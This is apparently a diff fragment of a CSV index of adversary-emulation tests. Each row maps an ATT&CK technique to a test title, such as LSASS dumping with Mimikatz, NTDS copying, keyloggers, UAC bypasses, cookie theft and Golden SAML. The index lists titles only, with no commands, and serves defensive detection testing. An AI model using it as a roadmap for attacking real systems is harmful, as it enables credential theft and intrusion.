credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1555.004,Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -171,56 +9,31 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -234,12 +47,8 @@ privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-
privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -248,26 +57,16 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell R
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
